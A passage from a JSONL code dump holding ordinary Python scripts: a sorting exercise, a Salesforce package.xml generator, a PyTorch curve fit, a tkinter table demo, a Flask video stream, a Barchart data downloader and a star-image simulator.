TypeError('bad operand type!')\r\n elif not(isinstance(count, (int))):\r\n raise TypeError('bad operand type!')\r\n else:\r\n self.start = start\r\n self.end = end\r\n self.count = count\r\n self.a = []\r\n # 生成若干个指定范围的随机数并添加入列表中\r\n if self.count <= 0:\r\n print('不生成随机数!')\r\n else: \r\n for i in range(self.count):\r\n self.a.append(random.uniform(self.start, self.end))\r\n print(self.a)\r\n\r\n # 实现排序功能并返回列表\r\n def __mysort__(self):\r\n for i in range(len(self.a)):\r\n for j in range(len(self.a)-i-1):\r\n if self.a[j] > self.a[j+1]:\r\n self.a[j], self.a[j+1] = self.a[j+1], self.a[j]\r\n return self.a\r\n \r\nif __name__ == '__main__':\r\n # Clac对象实例化\r\n result = Calc(4, 2)\r\n print('四则运算结果:', result.div())\r\n # MySort对象实例化\r\n print('初始化:')\r\n mylist = MySort(1, 10, 3)\r\n print('排序后:\\n{0}'.format(mylist.__mysort__()))\r\n ","sub_path":"第一期/深圳-Alex/task01.py","file_name":"task01.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"5588404","text":"import os.path\nimport os\nimport subprocess\nimport configparser\nimport logging\nimport shutil\nfrom xml.dom import minidom\nfrom git import Repo\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG) \nc_handler = logging.StreamHandler()\nc_format = logging.Formatter('%(name)s - %(levelname)s - %(message)s')\nc_handler.setFormatter(c_format)\nlogger.addHandler(c_handler)\n\n# BUILD_FOLDER = os.path.join(os.environ['system.teamcity.build.workingDir'],'src')\nWORKING_DIR = os.path.normpath(os.path.dirname(__file__))\nBUILD_FOLDER = os.path.join(WORKING_DIR,'deploy')\nPACKAGE_XML = os.path.join(WORKING_DIR,'package.xml')\nDESTRUCTIVE_XML = os.path.join(WORKING_DIR,'destructiveChangesPost.xml')\nTEMPLATE_XML = os.path.join(WORKING_DIR,'packagexml_template.xml')\n\ndef describe_metadata(config):\n result = subprocess.run([\"ant\",\"describeMetadata\"],text=True,capture_output=True)\n replaced = result.stdout.replace('*','')\n s = replaced.replace('[sf:describeMetadata]','').splitlines()\n xmlNames = [st.replace('XMLName','').replace(':','').strip() for st in s if 'XMLName' in st]\n dirNames = [st.replace('DirName','').replace(':','').strip() for st in s if 'DirName' in st]\n \n config['MAPPING'] = dict(zip(dirNames,xmlNames))\n with open('config.ini','w') as configfile:\n config.write(configfile) \n\ndef get_members(config):\n repo = Repo(WORKING_DIR)\n repo.git.checkout(config['CI']['BRANCH_NAME'])\n logger.debug(f'Getting files from commit on branch 
{config[\"CI\"][\"BRANCH_NAME\"]}')\n\n head_commit = repo.commit('HEAD')\n \n deleted = []\n if len(head_commit.parents) > 0:\n previous_commit = repo.commit('HEAD~1')\n deleted = [ item.a_path for item in previous_commit.diff(head_commit).iter_change_type('D')]\n\n changed_result = { md_type:[] for md_type in config['MAPPING']}\n deleted_result = { md_type:[] for md_type in config['MAPPING']}\n metadata_ext = ['.cls','.trigger','.component','.page']\n\n for file_path in head_commit.stats.files.keys():\n try:\n if not file_path.endswith('.xml') and 'src' in file_path:\n splitted_path = file_path.split('/')\n path = splitted_path[1:-1]\n md_type = splitted_path[1]\n file = os.path.splitext(splitted_path[-1])\n file_name = file[0]\n file_ext = file[1]\n\n if file_path in deleted:\n deleted_result[md_type].append(file_name)\n else:\n move_to_deploy(file_path,path,BUILD_FOLDER)\n changed_result[md_type].append(file_name)\n if file_ext in metadata_ext:\n md_ext = file_ext + '-meta.xml'\n md_name = file_name + md_ext\n splitted_path[-1] = md_name\n md_path = os.path.join('',*splitted_path)\n move_to_deploy(md_path,path,BUILD_FOLDER)\n\n # if not file_path.endswith('.xml') and 'src' in file_path:\n # splitted_line = file_path.split('/')\n # md_type = splitted_line[-2].lower()\n # member = splitted_line[-1]\n # if file_path in deleted:\n # deleted_result[md_type].append(os.path.splitext(member)[0])\n # else:\n # move_to_deploy(file_path,BUILD_FOLDER)\n # changed_result[md_type].append(os.path.splitext(member)[0])\n except KeyError:\n logger.debug('KeyError, not found metadata type')\n pass\n return (changed_result, deleted_result)\n\ndef move_to_deploy(file_path,path,dst):\n dst = os.path.normpath(os.path.join(dst,*path))\n if not os.path.exists(dst):\n os.makedirs(dst)\n shutil.copy(os.path.normpath(os.path.join(WORKING_DIR,file_path)),dst)\n\n\n\ndef write_type(xml,type_name, members,path):\n root = xml.getElementsByTagName('Package')[0]\n root = xml.documentElement\n\n def createTextElement(xml,parent,tag,value):\n element = xml.createElement(tag)\n text = xml.createTextNode(value)\n element.appendChild(text)\n parent.appendChild(element)\n\n with open(path,'w') as writer:\n type_elem = xml.createElement('types')\n root.appendChild(type_elem)\n\n for member in members:\n createTextElement(xml,type_elem,'members',member)\n createTextElement(xml,type_elem,'name',type_name)\n\n pretty_xml = xml.toprettyxml()\n writer.write(pretty_xml)\n\ndef generate_package_xml(config):\n logger.debug('Start generating package.xml')\n commit_mdt = get_members(config) \n\n def write_members(template_path, items, result_path):\n template_xml = minidom.parse(template_path)\n for mdt_type, members in items:\n if members:\n write_type(template_xml,config['MAPPING'][mdt_type],members,result_path)\n\n write_members(TEMPLATE_XML,commit_mdt[0].items(),PACKAGE_XML)\n write_members(TEMPLATE_XML,commit_mdt[1].items(),DESTRUCTIVE_XML)\n\n\n if os.path.exists(os.path.abspath(PACKAGE_XML)):\n splitted_package = os.path.split(PACKAGE_XML)[1]\n os.replace(PACKAGE_XML, os.path.join(BUILD_FOLDER,splitted_package))\n\n # for fdir in PACKAGE_XML, DESTRUCTIVE_XML:\n # if os.path.exists(os.path.abspath(fdir)):\n # os.replace(fdir, os.path.join(BUILD_FOLDER,fdir))\n # elif fdir == PACKAGE_XML:\n # copyfile(TEMPLATE_XML,os.path.join(BUILD_FOLDER, PACKAGE_XML))\n\n\nif __name__ == \"__main__\":\n config = configparser.ConfigParser()\n config.read(os.path.join(WORKING_DIR,'config.ini'))\n if os.path.exists(BUILD_FOLDER):\n 
shutil.rmtree(BUILD_FOLDER)\n # if not config.has_section('MAPPING'):\n # describe_metadata(config)\n generate_package_xml(config)\n \n","sub_path":"package_generator.py","file_name":"package_generator.py","file_ext":"py","file_size_in_byte":5851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"270252670","text":"'''\n该代码没有搭建nn.Module模块,只使用了PyTorch的自动求导,\n利用梯度下降的方法暴力拟合曲线 y = np.exp(a*x*x + b*x +c)\n注意,观测点对(x,y)给出,三个参数分别是 x,y,z\n'''\n\nfrom __future__ import print_function, division\n\nimport torch\nfrom torch.autograd import Variable\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nnp.random.seed(1000) # 为了保证每次产生相同的伪随机数\ntorch.random.manual_seed(1000)\na = 2.0\nb = 3.0\nc = 1.0\nN = 300 # 300个观测数据\n\nX_np = np.random.rand(N)\nnoise = np.random.normal(loc=0.0, scale=1.0, size=N)*20 # 产生的高斯分布噪声,为了明显些,放大了20倍\nY_np = np.exp(a*X_np**2 + b*X_np + c)\nY_observed = Y_np + noise # 加入噪声之后的观测数据\n\n# 首先转换以下numpy的数据类型,PyTorch的求导好像支持float32,在其它地方改也可以\nX_np = X_np.astype('float32')\nnoise = noise.astype(np.float32)\nY_np = Y_np.astype('float32')\nY_observed = Y_observed.astype('float32')\n\nplt.scatter(X_np, Y_observed, color='b', label='Real Data')\nplt.legend()\nplt.title('Real Data')\nplt.show()\n\n\n# ===============================================\n\n# 将Numpy 转为 torch.Tensor\nX = torch.from_numpy(X_np).float().view(-1,1)\nY = torch.from_numpy(Y_observed).float().view(-1,1)\n\n# 经过多次实验之后,感受到了使用下降法的时候,初始值的选择确实很重要,\n# 所以,后来又再后面乘了个系数,让初始值稍微接近真实值一点,但实际中\n# 可能根本就不知道实际值是什么。\na = Variable(torch.abs(torch.randn(1, 1))*5, requires_grad=True)\nb = Variable(torch.abs(torch.randn(1, 1))*5, requires_grad=True)\nc = Variable(torch.abs(torch.randn(1, 1))*3, requires_grad=True)\n\n\n\ndef equation(a,b,c,X):\n return torch.exp(a*X**2 + b*X + c)\n\n# y_pred = equation(a,b,c,X)\n\n# 这里的学习率也是多次实验之后实验出来的,可以在\n# 可以改为一个大点的值,然后在我下方标注“打断点”的\n# 地方打上断点进行调试,可以发现a.grad的值非常大,\n# 这个可以根据y = np.exp(a*x*x + b*x +c)的图像理解\nlr = 0.00000001\nlosses = []\nfor e in range(1000000):\n pred = equation(a, b, c, X)\n loss = torch.mean((Y-pred)**2)\n if a.grad is not None and b.grad is not None and c.grad is not None:\n # PyTorch计算的梯度是会累加的,所以每次计算前要清零,\n # 但是,在没有调用backward()之前,a.grad是None,直接调用会报错,所以加了条件判断\n a.grad.zero_()\n b.grad.zero_()\n c.grad.zero_()\n loss.backward() # 计算梯度\n a.data = a.data - lr*a.grad # 打断点\n b.data = b.data - lr*b.grad\n c.data = c.data - lr*c.grad\n losses.append(loss.item())\n\n print(\"Epoch: {} Loss: {}\".format(e, loss.item()))\n\n# print(a.item(), b.item(), c.item())\n# plt.subplot(1, 2, 1)\n# plt.scatter(X_np, Y_observed, color='b', label='Real Data')\n# plt.scatter(X_np, equation(a,b,c,X).detach().numpy(), color='r', label='Fitting Data')\n# plt.legend(loc='best')\n# plt.title(\"a={:.4f} b={:.4f} c={:.4f}\".format(a.detach().item(), b.detach().item(), c.detach().item()))\n#\n# plt.subplot(1, 2, 2)\n# plt.plot(losses)\n# plt.title('Loss')\n# plt.xlabel('Epoch')\n# plt.ylabel('Loss')\n# plt.show()\n\n\nfig = plt.figure(figsize=(7,3))\nax1 = fig.add_subplot(121)\nax1.scatter(X_np, Y_observed, color='b', label='Real Data')\nax1.scatter(X_np, equation(a,b,c,X).detach().numpy(), color='r', label='Fitting Data')\nax1.legend(loc='best')\nplt.title(\"a={:.4f} b={:.4f} c={:.4f}\".format(a.detach().item(), b.detach().item(), c.detach().item()))\n\nax2 = 
fig.add_subplot(122)\nplt.plot(losses)\nplt.title('Loss')\nplt.xlabel('Epoch')\nplt.ylabel('Loss')\nplt.show()\n","sub_path":"codes/Optim_1/PyTorch_SGD.py","file_name":"PyTorch_SGD.py","file_ext":"py","file_size_in_byte":3759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"606022189","text":"import random\nimport tkinter\nimport tkinter.messagebox\nfrom tkinter import Tk, Scrollbar, Frame, RIGHT, Y, LEFT\nfrom tkinter.ttk import Treeview\n\n# 创建tkinter应用程序窗口\nroot = Tk()\n# 设置窗口大小和位置\nroot.geometry('500x340+400+300')\n# 不允许改变窗口大小\nroot.resizable(False, False)\n# 设置窗口标题\nroot.title('Treeview——Demo')\n\n# 在窗体上创建Frame组件作为容易\nframe = Frame(root)\nframe.place(x=0, y=10, width=480, height=280)\n\n# 在Frame容器中创建滚动条\nscrollBar = Scrollbar(frame)\nscrollBar.pack(side=RIGHT, fill=Y)\n\n# 在Frame容器中使用Treeview组件实现表格功能\n# Treeview组件,6列,显示表头,带垂直滚动条\ntree = Treeview(frame,\n                columns=('c1', 'c2', 'c3', 'c4', 'c5', 'c6'),\n                show=\"headings\",\n                yscrollcommand=scrollBar.set)\n\n# 设置每列宽度和对齐方式\ntree.column('c1', width=70, anchor='center')\ntree.column('c2', width=40, anchor='center')\ntree.column('c3', width=40, anchor='center')\ntree.column('c4', width=120, anchor='center')\ntree.column('c5', width=100, anchor='center')\ntree.column('c6', width=90, anchor='center')\n\n# 设置每列表头标题文本\ntree.heading('c1', text='姓名')\ntree.heading('c2', text='性别')\ntree.heading('c3', text='年龄')\ntree.heading('c4', text='部门')\ntree.heading('c5', text='电话')\ntree.heading('c6', text='QQ')\n\n# 左对齐,纵向填充\ntree.pack(side=LEFT, fill=Y)\n\n# Treeview组件与垂直滚动条结合\nscrollBar.config(command=tree.yview)\n\n# 定义并绑定Treeview组件的鼠标左键双击事件\ndef treeviewClick(event):\n    selectedItem = tree.selection()[0]\n    name = tree.item(selectedItem, 'values')[0]\n    tkinter.messagebox.showinfo('报告', '你选择的是\\n'+name)\ntree.bind('<Double-1>', treeviewClick)\n\n# 插入随机数据的按钮\ndef onbtnInsertClick():\n    values = [str(random.randrange(1000)) for _ in range(6)]\n    tree.insert('', 0, values=values)\nbtnInsert = tkinter.Button(root,\n                           text='插入随机数据',\n                           command=onbtnInsertClick)\nbtnInsert.place(x=80, y=310, width=120, height=20)\n\n# 删除选中项的按钮\ndef onbtnDeleteClick():\n    if not tree.selection():\n        tkinter.messagebox.showerror('抱歉', '你还没有选择,不能删除')\n        return\n    for item in tree.selection():\n        tree.delete(item)\nbtnDelete = tkinter.Button(root,\n                           text='删除选中项',\n                           command=onbtnDeleteClick)\nbtnDelete.place(x=220, y=310, width=120, height=20)\n\n# 插入演示数据\nfor i in range(20):\n    tree.insert('', i, values=[str(i)]*6)\n    \n# 运行程序,启动事件循环\nroot.mainloop()\n","sub_path":"python项目/GUI编程/tkinter_TreeviewGrid.pyw","file_name":"tkinter_TreeviewGrid.pyw","file_ext":"pyw","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"127546809","text":"from flask import Flask, render_template, Response\nfrom plateRecognizer import plateRecognizer\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n    plate = plateRecognizer()\n    plate.videoRecognition()\n    return \"ok\"\n\ndef gen(plateRecognizer):\n    while True:\n        frame = plateRecognizer.get_frame()\n        yield (b'--frame\\r\\n'\n               b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')\n\n@app.route('/video_feed')\ndef video_feed():\n    return Response(gen(plateRecognizer()),\n                    mimetype='multipart/x-mixed-replace; boundary=frame')\n\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', 
debug=True)","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"172788218","text":"'''\n************************ Overview ************************\nThis workbook automates the download of futures daily pricing \n zip files from Barchart ACS.\n\n1. It will use Selenium to login to the Barchart ACS site; \n2. It will scrape the urls of the zip files, and then download those zipfiles into a folder which is specified using:\n folder (specified by the command line argumet zip_folder_parent)\n \n************************ Usage ************************\npython3 step_01_download_monthly_acs_files_only_futures.py --acs_username myusername \\\n--acs_password mypassword --zip_folder_parent myhome/barchart_files --begin_yy 11 --end_yy 19\n\n\n'''\n\n'''\n************************** Step 1: Imports **************************\n'''\nimport argparse as ap\nimport sel_scrape as sc #@UnresolvedImport\n# from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n# from selenium.webdriver.common.alert import Alert\nfrom selenium.webdriver.support.ui import WebDriverWait as wait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport requests\nfrom requests.auth import HTTPBasicAuth\nimport os\nimport time\nimport traceback\nfrom tqdm import tqdm\nimport numpy as np\nimport logging\nimport re\n\n\ndef init_root_logger(logfile,logging_level=None):\n level = logging_level\n if level is None:\n level = logging.DEBUG\n # get root level logger\n logger = logging.getLogger()\n if len(logger.handlers)>0:\n return logger\n logger.setLevel(logging.getLevelName(level))\n\n fh = logging.FileHandler(logfile)\n fh.setLevel(logging.DEBUG)\n # create console handler with a higher log level\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n # create formatter and add it to the handlers\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n # add the handlers to the logger\n logger.addHandler(fh)\n logger.addHandler(ch) \n return logger\n\nif __name__ == '__main__':\n parser = ap.ArgumentParser()\n parser.add_argument('--acs_username',type=str,\n help='username of Barchart ACS service')\n parser.add_argument('--acs_password',type=str,\n help='password of Barchart ACS service')\n parser.add_argument('--zip_folder_parent',type=str,\n help='full folder path into which you will download zip files')\n parser.add_argument('--begin_yy',type=int,\n help='2 character year like 11 for 2011 or 23 for 2023 for first year of options zip files to download from barchart')\n parser.add_argument('--end_yy',type=int,\n help='2 character year like 11 for 2011 or 23 for 2023 for last year of options zip files to download from barchart')\n parser.add_argument('--month_list',type=str,\n help='comma separated list (NO SPACES) of 3 character months like jan,feb,mar. Omit to do all months for each year.',\n default=\"\")\n parser.add_argument('--log_file_path',type=str,\n help='path to log file. Default = logfile.log',\n default = 'logfile.log')\n parser.add_argument('--show_browser',type=bool,\n help='if --show_browser is on the command line, then the browser will be shown during scraping')\n parser.add_argument('--logging_level',type=str,\n help='log level. 
Default = INFO',\n default = 'INFO')\n \n args = parser.parse_args()\n\n '''\n ********************************** Step 2: Set import variables ******************\n \n Determine years to download, and the download location\n \n Set the variables \n ZIP_FOLDER_PARENT\n BEGIN_YY\n END_YY\n \n These values determine \n 1. The location to which zip files get downloaded;\n 2. The first year and last year of daily options settlements to scrape from the Barchart ACS website.\n \n '''\n \n ZIP_FOLDER_PARENT = args.zip_folder_parent\n BEGIN_YY = args.begin_yy\n END_YY = args.end_yy\n ACS_USERNAME = args.acs_username\n ACS_PASSWORD = args.acs_password\n month_list = args.month_list\n \n log_file_path = args.log_file_path\n logging_level = args.logging_level\n logger = init_root_logger(log_file_path, logging_level)\n \n logger.info(f'ZIP_FOLDER_PARENT into which files will be download = {ZIP_FOLDER_PARENT}')\n headless = False if args.show_browser else True\n \n \n '''\n **************************** Step 3: Set important constants *****************************\n The constants below should be left as is - DO NOT CHANGE.\n '''\n MMM_LIST = ['jan','feb','mar','apr','may','jun','jul','aug','sep','oct','nov','dec']\n if month_list is not None and len(month_list)>0:\n MMM_LIST = month_list.replace(\" \",\"\").split(\",\")\n logger.info(f\"using month list {MMM_LIST}\")\n YY_LIST = list(np.arange(BEGIN_YY,END_YY+1))\n MMMYY_LIST = [mmm + str(yy) for mmm in MMM_LIST for yy in YY_LIST]\n ACS_HOME_PAGE = 'http://acs.barchart.com/mri/mripag.htm' \n ACS_FUTURES_PAGE = 'http://acs.barchart.com/mri/mrgfutz.htm'\n# ACS_OPTIONS_PAGE = 'http://acs.barchart.com/mri/mriopt.htm'\n \n '''\n **************************** Step 4: Set ZIP_FOLDER_PARENT ******************************\n Determine ZIP_FOLDER_PARENT, which represents the folder into which Barchart ACS zip files get downloaded.\n '''\n if not os.path.exists(ZIP_FOLDER_PARENT):\n logger.info(f'making parent folder {ZIP_FOLDER_PARENT}')\n os.makedirs(ZIP_FOLDER_PARENT)\n else:\n logger.info(f'parent folder {ZIP_FOLDER_PARENT} already exists')\n \n# \n# '''\n# ************************ Step 5: Instantiate SelScape ***************\n# Instantiate an instance of sel_scape.SelScrape in order to \n# scrape the Barchart ACS website. 
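(Steps 5-8 below, the options-file download, are intentionally left commented out in this futures-only variant.)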
\n# '''\n# \n# sela = sc.SelScrape(headless=headless)\n# sela.goto(ACS_HOME_PAGE)\n# time.sleep(1)\n# wait(sela.driver, 5).until(EC.alert_is_present())\n# alert = sela.driver.switch_to_alert()\n# alert.send_keys(f'{ACS_USERNAME}{Keys.TAB}{ACS_PASSWORD}')\n# time.sleep(3)\n# alert.accept()\n# \n# '''\n# ************************ Step 6: Navigate to Home Page ****************\n# '''\n# sela.goto(ACS_OPTIONS_PAGE)\n# \n# \n# '''\n# ************************ Step 7: Obtain URLS ****************\n# Scrape the urls for options zip files to be downloaded.\n# '''\n# monthly_csv_files_xpath = \"//a[contains(@href,'data/opt/opv')]\"\n# mcsv_elements = sela.findxpath(monthly_csv_files_xpath)['value']\n# mcsv_hrefs_all = []\n# for mcsv in mcsv_elements:\n# mcsv_hrefs_all.append(mcsv.get_attribute('href'))\n# mcsv_hrefs_all\n# \n# def is_valid_yyymm(h):\n# return any([m in h for m in MMMYY_LIST])\n# mcsv_hrefs = [h for h in mcsv_hrefs_all if is_valid_yyymm(h) ] \n# mcsv_hrefs\n# \n# \n# '''\n# ************************ Step 8: Execute Download ****************\n# Download the zip files into their appropriate folders.\n# '''\n# \n# options_parent = ZIP_FOLDER_PARENT+'/options'\n# if not os.path.isdir(options_parent):\n# logger.info(f'making options folder {options_parent}')\n# os.mkdir(options_parent)\n# else:\n# logger.info(f'options folder {options_parent} already exists')\n# hrefs_to_unzip = []\n# paths_to_unzip_to = []\n# for mcsv_href in mcsv_hrefs:\n# zip_file_name = mcsv_href.split('/')[-1]\n# folder_name = zip_file_name.replace('.zip','')\n# path_to_zip_folder = f'{options_parent}/{folder_name}'\n# if not os.path.isdir(path_to_zip_folder):\n# logger.info(f'making {path_to_zip_folder}')\n# os.mkdir(path_to_zip_folder)\n# path_to_zip_file = f'{path_to_zip_folder}/{zip_file_name}'\n# if not os.path.isfile(path_to_zip_file):\n# hrefs_to_unzip.append(mcsv_href)\n# paths_to_unzip_to.append(path_to_zip_file)\n# \n# successful_downloads = []\n# for i in tqdm(range(len(hrefs_to_unzip))):\n# url = hrefs_to_unzip[i]\n# path_to_zip_file = paths_to_unzip_to[i]\n# try: \n# r=requests.get(url, auth=HTTPBasicAuth(ACS_USERNAME, ACS_PASSWORD))\n# p = paths_to_unzip_to[i]\n# with open(p, 'wb') as f:\n# f.write(r.content)\n# successful_downloads.append(path_to_zip_file)\n# except Exception as e:\n# traceback.print_exc()\n# \n# sela.driver.quit() \n \n def is_valid_yyymm(h):\n return any([m in h for m in MMMYY_LIST])\n\n '''\n ************************ Step 9: Setup Folders for Futures Download ****************\n '''\n futures_parent = ZIP_FOLDER_PARENT+'/futures'\n if not os.path.isdir(futures_parent):\n logger.info(f'making futures folder {futures_parent}')\n os.mkdir(futures_parent)\n else:\n logger.info(f'futures folder {futures_parent} already exists')\n\n\n '''\n ************************ Step 10: Instantiate a new SelScrape ****************\n '''\n sela = sc.SelScrape(headless=headless)\n sela.goto(ACS_HOME_PAGE)\n time.sleep(1)\n wait(sela.driver, 5).until(EC.alert_is_present())\n alert = sela.driver.switch_to_alert()\n alert.send_keys(f'{ACS_USERNAME}{Keys.TAB}{ACS_PASSWORD}')\n time.sleep(3)\n alert.accept()\n\n '''\n ************************ Step 11: Execute the Download of Monthly Futures zip files ****************\n '''\n sela.goto(ACS_FUTURES_PAGE)\n monthly_csv_files_xpath = \"//td/a[contains(@href,'data/mrg/mrg')]\"\n mcsv_elements = sela.findxpath(monthly_csv_files_xpath)['value']\n mcsv_hrefs_all = []\n for mcsv in mcsv_elements:\n mcsv_hrefs_all.append(mcsv.get_attribute('href'))\n all_years = 
np.arange(BEGIN_YY,END_YY+1)\n mcsv_hrefs = [h for h in mcsv_hrefs_all if (int(re.findall('[0-9]{1,2}',h)[0]) in all_years) and (is_valid_yyymm(h))] \n \n hrefs_to_unzip = []\n paths_to_unzip_to = []\n for mcsv_href in mcsv_hrefs:\n zip_file_name = mcsv_href.split('/')[-1]\n path_to_zip_file = f'{futures_parent}/{zip_file_name}'\n if not os.path.isfile(path_to_zip_file):\n hrefs_to_unzip.append(mcsv_href)\n paths_to_unzip_to.append(path_to_zip_file)\n \n successful_downloads = []\n for i in tqdm(range(len(hrefs_to_unzip))):\n try: \n url = hrefs_to_unzip[i]\n r=requests.get(url, auth=HTTPBasicAuth(ACS_USERNAME, ACS_PASSWORD))\n p = paths_to_unzip_to[i]\n with open(p, 'wb') as f:\n f.write(r.content)\n successful_downloads.append(path_to_zip_file)\n except Exception as e:\n traceback.print_exc()\n \n \n sela.driver.quit() \n \n '''\n ************************ END ****************\n '''\n \n \n","sub_path":"barchartacs/step_01_download_monthly_acs_files_only_futures.py","file_name":"step_01_download_monthly_acs_files_only_futures.py","file_ext":"py","file_size_in_byte":11055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"462446252","text":"HTML_ORIGINAL = 'base-index.html'\n\nCSS_INJECTION_TAG = ''\nHTML_INJECTION_TAG = ''\nCSS_STR = (5*' ' + '')\nHTML_STR = \"{html}\"\n\nwith open(HTML_ORIGINAL, 'r') as original:\n pre_model = original.read()\n\npre_model = pre_model.replace(CSS_INJECTION_TAG, CSS_STR)\nmodel = pre_model.replace(HTML_INJECTION_TAG, HTML_STR)\n","sub_path":"page_model.py","file_name":"page_model.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"279342454","text":"from math import radians,degrees,sin,cos,tan,sqrt,atan,pi,exp\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport cv2\n\ndef displayImg(img,cmap='gray'):\n \"\"\"[Displays image]\n\n Args:\n img ([numpy array]): [the pixel values in the form of numpy array]\n cmap ([string], optional): [can be 'gray']. 
Defaults to None.\n \"\"\"\n fig = plt.figure(figsize=(12,10))\n ax = fig.add_subplot(111)\n ax.imshow(img,cmap)\n plt.show()\n\ndef create_star_image(ra,de,roll,f=0.00304,myu=1.12*(10**-6)):\n \"\"\"[summary]\n\n Args:\n ra ([float]): [right ascension in degrees]\n de ([float]): [declination in degrees]\n roll ([float]): [roll in degrees]\n \"\"\"\n\n\n def create_M_matrix(ra,de,roll,method=2):\n \"\"\"[summary]\n\n Args:\n ra ([int]): [right ascension of sensor center]\n de ([int]): [declination of sensor center]\n roll ([int]): [roll angle of star sensor]\n method ([int]): [1 for method 1(Calculating each elements),2 for method 2(calculating rotation matrices)]\n \"\"\"\n if method == 1:\n a1 = (sin(ra)*cos(roll)) - (cos(ra)*sin(de)*sin(roll))\n a2 = -(sin(ra)*sin(roll)) - (cos(ra)*sin(de)*cos(roll))\n a3 = -(cos(ra)*cos(de))\n b1 = -(cos(ra)*cos(roll)) - (sin(ra)*sin(de)*sin(roll))\n b2 = (cos(ra)*sin(roll)) - (sin(ra)*sin(de)*cos(roll))\n b3 = -(sin(ra)*cos(de))\n c1 = (cos(ra)*sin(roll))\n c2 = (cos(ra)*cos(roll))\n c3 = -(sin(de))\n M = np.array([[a1,a2,a3],[b1,b2,b3],[c1,c2,c3]])\n if method == 2:\n ra_exp = ra - (pi/2)\n de_exp = de + (pi/2)\n M1 = np.array([[cos(ra_exp),-sin(ra_exp),0],[sin(ra_exp),cos(ra_exp),0],[0,0,1]])\n M2 = np.array([[1,0,0],[0,cos(de_exp),-sin(de_exp)],[0,sin(de_exp),cos(de_exp)]])\n M3 = np.array([[cos(roll),-sin(roll),0],[sin(roll),cos(roll),0],[0,0,1]])\n first_second = np.matmul(M1,M2)\n M = np.matmul(first_second,M3)\n return M\n\n\n def dir_vector_to_star_sensor(ra,de,M_transpose):\n \"\"\"[Converts direction vector to star sensor coordinates]\n\n Args:\n ra ([int]): [right ascension of the object vector]\n de ([int]): [desclination of the object vector]\n M_transpose ([numpy array]): [rotation matrix from direction vector to star sensor transposed]\n \"\"\" \n x_dir_vector = (cos(ra)*cos(de))\n y_dir_vector = (sin(ra)*cos(de))\n z_dir_vector = (sin(de))\n dir_vector_matrix = np.array([[x_dir_vector],[y_dir_vector],[z_dir_vector]])\n return M_transpose.dot(dir_vector_matrix)\n\n\n def draw_star(x,y,magnitude,gaussian,background,ROI=5):\n \"\"\"[Draws the star in the background image]\n\n Args:\n x ([int]): [The x coordinate in the image coordinate system (starting from left to right)]\n y ([int]): [The y coordinate in the image coordinate system (starting from top to bottom)]\n magnitude ([float]): [The stellar magnitude]\n gaussian ([bool]): [True if using the gaussian function, false if using own function]\n background ([numpy array]): [background image]\n ROI ([int]): [The ROI of each star in pixel radius]\n \"\"\"\n if gaussian:\n H = 2000*exp(-magnitude+1)\n sigma = 5\n for u in range(x-ROI,x+ROI+1):\n for v in range(y-ROI,y+ROI+1):\n dist = ((u-x)**2)+((v-y)**2)\n diff = (dist)/(2*(sigma**2))\n exponent_exp = 1/(exp(diff))\n raw_intensity = int(round((H/(2*pi*(sigma**2)))*exponent_exp))\n background[v,u] = raw_intensity\n else:\n mag = abs(magnitude-7) #1 until 9\n radius = int(round((mag/9)*(5)+3))\n color = int(round((mag/9)*(155)+100))\n cv2.circle(background,(x,y),radius,color,thickness=-1)\n return background\n\n def add_noise(low,high,background):\n \"\"\"[Adds noise to an image]\n\n Args:\n low ([int]): [lower threshold of the noise generated]\n high ([int]): [maximum pixel value of the noise generated]\n background ([numpy array]): [the image that is put noise on]\n \"\"\"\n row,col = np.shape(background)\n background = background.astype(int)\n noise = np.random.randint(low,high=high,size=(row,col))\n noised_img = 
cv2.addWeighted(noise,0.1,background,0.9,0)\n return noised_img\n\n\n #Right ascension, declination and roll\n ra = radians(float(ra))\n de = radians(float(de))\n roll = radians(float(roll))\n\n #Star sensor pixel\n l = 3280\n w = 2464\n\n #Star sensor FOV\n FOVy = degrees(2*atan((myu*w/2)/f))\n FOVx = degrees(2*atan((myu*l/2)/f))\n\n #STEP 1: CONVERSION OF CELESTIAL COORDINATE SYSTEM TO STAR SENSOR COORDINATE SYSTEM\n M = create_M_matrix(ra,de,roll)\n M_transpose = np.round(np.matrix.transpose(M),decimals=5)\n\n #Search for image-able stars\n col_list = [\"Star ID\",\"RA\",\"DE\",\"Magnitude\"]\n star_catalogue = pd.read_csv('filtered_catalogue/Below_6.0_SAO.csv',usecols=col_list)\n R = (sqrt((radians(FOVx)**2)+(radians(FOVy)**2))/2)\n alpha_start = (ra - (R/cos(de)))\n alpha_end = (ra + (R/cos(de)))\n delta_start = (de - R)\n delta_end = (de + R)\n star_within_ra_range = (alpha_start <= star_catalogue['RA']) & (star_catalogue['RA'] <= alpha_end)\n star_within_de_range = (delta_start <= star_catalogue['DE']) & (star_catalogue['DE'] <= delta_end)\n star_in_ra = star_catalogue[star_within_ra_range]\n star_in_de = star_catalogue[star_within_de_range]\n star_in_de = star_in_de[['Star ID']].copy()\n stars_within_FOV = pd.merge(star_in_ra,star_in_de,on=\"Star 